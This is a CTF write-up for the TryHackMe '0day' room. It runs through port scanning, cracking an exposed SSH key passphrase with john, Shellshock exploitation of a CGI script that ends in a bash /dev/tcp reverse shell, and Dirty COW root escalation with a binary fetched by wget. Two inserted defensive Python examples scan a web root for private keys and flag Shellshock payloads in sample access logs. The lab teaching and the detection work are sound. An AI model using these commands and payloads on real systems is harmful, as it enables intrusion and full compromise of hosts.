0day — TryHackMe — WriteUp

TonyRahmos
5 min read · Nov 22, 2020


Hello. I’m Rahmos. Here is my 0day — TryHackMe — WriteUp. Check it out!

First, deploy the machine and run nmap to find open ports:

nmap -A -p- -T4 -v <ip>

[screenshot: nmap output]

There are 2 open ports: 22 (SSH) and 80 (HTTP). Let’s first visit the website.

[screenshot: website]

It’s a well-designed website, huh! It’s always good to check the page source (Ctrl+U), but I’ve checked it and found nothing valuable. So, let’s now find some hidden directories using gobuster.

gobuster dir -u <ip>:80 -w /path-to-wordlists

[screenshot: gobuster output]

There are many hidden directories here. Since robots.txt exists, let’s access it first.

[screenshot: robots.txt]

Nothing really. Next, /secret

[screenshot: /secret]

A turtle image? Looks like it’s time for some steganography. Download the image and look for hidden data. However, I’ve tried and found nothing, so you may skip it.

Next, /backup

[screenshot: /backup]

It’s a private SSH RSA key! Let’s see if I can crack its passphrase using john.

First, use ssh2john.py to convert the key into a hash format that john understands.

python ssh2john.py rsakey > key-to-crack.txt

Then, use john to crack this key:

john --wordlist=/path-to-wordlist key-to-crack.txt

After a while, I’ve got the passphrase:

[screenshot: john output]

I tried to log in over SSH as ryan (the name I saw on the default website) with this private key. However, it didn’t work. So this private key is a complete rabbit hole 😣
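The key in /backup was served straight from the web root, which is the real finding here regardless of whether it logs in: an attacker who can download a key can run john against it offline, exactly as above. The following is an added example, not part of this write-up, showing how a defender would sweep a directory tree for private-key material and report whether each key is passphrase-protected. It recognises legacy PEM, PKCS#8 and OpenSSH-format keys by their headers (for OpenSSH keys it reads the cipher name stored in the base64 body, where "none" means unencrypted). The sample files it creates are constructed filler, not real key material, and the directory names are chosen only to mirror the /backup path above.

```python
"""Sweep a directory tree (e.g. a web root) for exposed private keys.

Added example, not part of the original write-up. All sample files written
by build_demo_webroot() are constructed filler, not valid keys.
"""
import base64
import binascii
import os
import re
import struct
import tempfile

# Legacy PEM and PKCS#8 headers; PKCS#8 signals encryption in the header itself.
PEM_HEADER_RE = re.compile(r'^-----BEGIN ((?:RSA |DSA |EC |ENCRYPTED )?PRIVATE KEY)-----$', re.M)
# Legacy PEM signals encryption with a Proc-Type line instead.
PEM_PROC_TYPE_RE = re.compile(r'^Proc-Type: 4,ENCRYPTED$', re.M)
OPENSSH_HEADER = "-----BEGIN OPENSSH PRIVATE KEY-----"
OPENSSH_FOOTER = "-----END OPENSSH PRIVATE KEY-----"
OPENSSH_MAGIC = b"openssh-key-v1\x00"   # first field of the OpenSSH key format


def openssh_cipher(text):
    """Cipher name stored in an OpenSSH-format key ('none' = unencrypted); None if malformed."""
    try:
        start = text.index(OPENSSH_HEADER) + len(OPENSSH_HEADER)
        end = text.index(OPENSSH_FOOTER)
        raw = base64.b64decode("".join(text[start:end].split()))
        if not raw.startswith(OPENSSH_MAGIC):
            return None
        off = len(OPENSSH_MAGIC)
        (n,) = struct.unpack(">I", raw[off:off + 4])   # length-prefixed cipher name
        return raw[off + 4:off + 4 + n].decode("ascii", "replace")
    except (ValueError, binascii.Error, struct.error):
        return None


def classify_key(text):
    """None if the text holds no private key; else 'plaintext', 'encrypted' or 'unknown'."""
    if OPENSSH_HEADER in text:
        cipher = openssh_cipher(text)
        if cipher is None:
            return "unknown"
        return "plaintext" if cipher == "none" else "encrypted"
    m = PEM_HEADER_RE.search(text)
    if not m:
        return None
    if m.group(1) == "ENCRYPTED PRIVATE KEY" or PEM_PROC_TYPE_RE.search(text):
        return "encrypted"
    return "plaintext"


def scan_tree(root):
    """Return sorted (relative path, classification) pairs for every key found under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read(65536)   # keys are small; do not slurp large files
            except OSError:
                continue
            kind = classify_key(text)
            if kind:
                findings.append((os.path.relpath(path, root), kind))
    return sorted(findings)


def openssh_sample(cipher):
    """Constructed OpenSSH-format stub carrying only the magic and cipher name (not a real key)."""
    raw = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher.encode()
    return f"{OPENSSH_HEADER}\n{base64.b64encode(raw).decode()}\n{OPENSSH_FOOTER}\n"


def build_demo_webroot():
    """Create a temporary web root holding constructed sample files; returns its path."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    os.makedirs(os.path.join(root, "backup"))
    filler = "Q0VSVEFJTkxZIE5PVCBBIFJFQUwgS0VZ\n"   # constructed base64 filler
    samples = {
        "index.html": "<html><body>Hello</body></html>\n",
        "backup/id_rsa_legacy": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                                 "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                                 + filler + "-----END RSA PRIVATE KEY-----\n"),
        "backup/id_rsa_plain": "-----BEGIN RSA PRIVATE KEY-----\n" + filler + "-----END RSA PRIVATE KEY-----\n",
        "backup/id_ed25519": openssh_sample("none"),
        "backup/id_ed25519_enc": openssh_sample("aes256-ctr"),
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, kind in scan_tree(build_demo_webroot()):
        print(f"{kind:10s} {rel}")
```

A "plaintext" hit under a web root is an immediate rotate-and-remove; an "encrypted" hit is not safe either, since the passphrase is only as strong as the wordlist it survives, which is precisely what the ssh2john step above tests.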

Let’s look at the hint. It says to focus on the room description, which mentions Shellshock: a remote code execution vulnerability in the Bash shell.

[screenshot: Shellshock description]

So, in order to exploit this vulnerability, I need to know the CGI script’s name. Let’s use gobuster again, but this time start from the /cgi-bin directory and set the file extension to .cgi:

gobuster dir -u <ip>:80/cgi-bin -x cgi -w /path-to-wordlist

[screenshot: gobuster output]

Yes! I’ve found test.cgi:

[screenshot: test.cgi]
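Before moving on to the exploit, it is worth seeing what this attack looks like from the server side. Shellshock reaches a CGI script through HTTP headers that the web server exports as environment variables, so the telltale "() {" function-definition prefix lands verbatim in the logged User-Agent or Referer. The following is an added example, not part of this write-up: a small detector that parses Apache "combined" format lines and flags requests carrying that marker. The log lines are constructed samples (the requests to test.cgi mirror the path found above); the probe commands in them are the harmless recon strings mass scanners typically send.

```python
"""Flag Shellshock-style payloads in web server access logs.

Added example, not part of the original write-up. SAMPLE_LOG is a
constructed Apache "combined" format log, not real traffic.
"""
import re

# Apache combined format:
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The Shellshock marker: an exported function body "() {" inside a header
# value, with optional whitespace between the tokens.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Header fields from the combined format that a CGI server turns into
# environment variables (HTTP_USER_AGENT, HTTP_REFERER, REQUEST_URI).
CHECKED_FIELDS = ("agent", "referer", "request")

SAMPLE_LOG = """\
10.0.0.5 - - [22/Nov/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.5 - - [22/Nov/2020:10:00:02 +0000] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [22/Nov/2020:10:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 13 "-" "() { :; }; echo; /usr/bin/id"
10.0.0.9 - - [22/Nov/2020:10:00:04 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 13 "() { :;}; echo; /bin/uname -a" "python-requests/2.24"
10.0.0.5 - - [22/Nov/2020:10:00:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 13 "-" "curl/7.68.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def shellshock_field(entry):
    """Name of the first checked field carrying the marker, or None if the request is clean."""
    for field in CHECKED_FIELDS:
        if SHELLSHOCK_RE.search(entry[field]):
            return field
    return None


def request_path(request):
    """Extract the path from a request line such as 'GET /cgi-bin/test.cgi HTTP/1.1'."""
    parts = request.split(" ")
    return parts[1] if len(parts) > 1 else request


def find_shellshock_attempts(log_text):
    """Return one dict per flagged request: line number, source host, path and matching field."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            continue   # unparseable line; a real pipeline would count and report these
        field = shellshock_field(entry)
        if field:
            hits.append({"line": lineno, "host": entry["host"],
                         "path": request_path(entry["request"]), "field": field})
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['host']} -> {hit['path']} (marker in {hit['field']})")
```

Two caveats for anyone running this against real logs: the combined format records only User-Agent and Referer, while the CGI module exports every request header (Cookie, Host and any custom header) into the environment, so log-based detection catches common scanners but not every delivery path; and a 200 status on a flagged request says nothing about whether the payload ran, so the next stop is the process accounting or shell history on the host.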

Now let’s exploit the Shellshock vulnerability. I will use a tool called Shocker from GitHub. Here is the link to the GitHub repo.

[screenshot: shocker]

First, start a listener on your machine:

nc -lvnp 4444

Then, use shocker to execute a reverse shell command:

python shocker.py -H <target-ip> -c /cgi-bin/test.cgi

[screenshot: shocker output]

It works! Now enter 1 to continue exploiting:

Now use a reverse shell command to get a shell back to your machine. If you haven’t already, start a listener on your machine:

nc -lvnp 4444

Then, enter this command to shocker:

/bin/bash -c '/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1'

[screenshot: reverse shell]

Now I’ve got the shell! Look around and grab the first flag in ryan’s home folder.

[screenshot: user.txt]

Next, find a way to become root so I can read the final flag. I will spawn a TTY shell using Python for stability and then check sudo:

python -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Let’s try sudo -l to see if I can run sudo:

sudo -l

Uh oh! I cannot run sudo on this machine. So let’s find another way. Looking at the description again, there’s a kernel exploit. Check the kernel version with uname -r:

[screenshot: kernel version]

Well, it’s a really old kernel version! I looked for an exploit on Google and found this link.

Download the code and compile it:

gcc -pthread 40839.c -o cow -lcrypt

Then use Python and wget to transfer the compiled exploit to the target. First, start an HTTP server in the folder that contains your exploit:

python3 -m http.server 9000

Or if you use python2:

python2 -m SimpleHTTPServer 9000

Then, from the target machine, cd to /tmp and download the exploit from your machine with wget:

wget <your-VPN-ip>:9000/cow

Run chmod +x cow to make it executable, execute it, and you will be root!

Now get the final flag in /root folder.

The end.

HAPPY HACKING
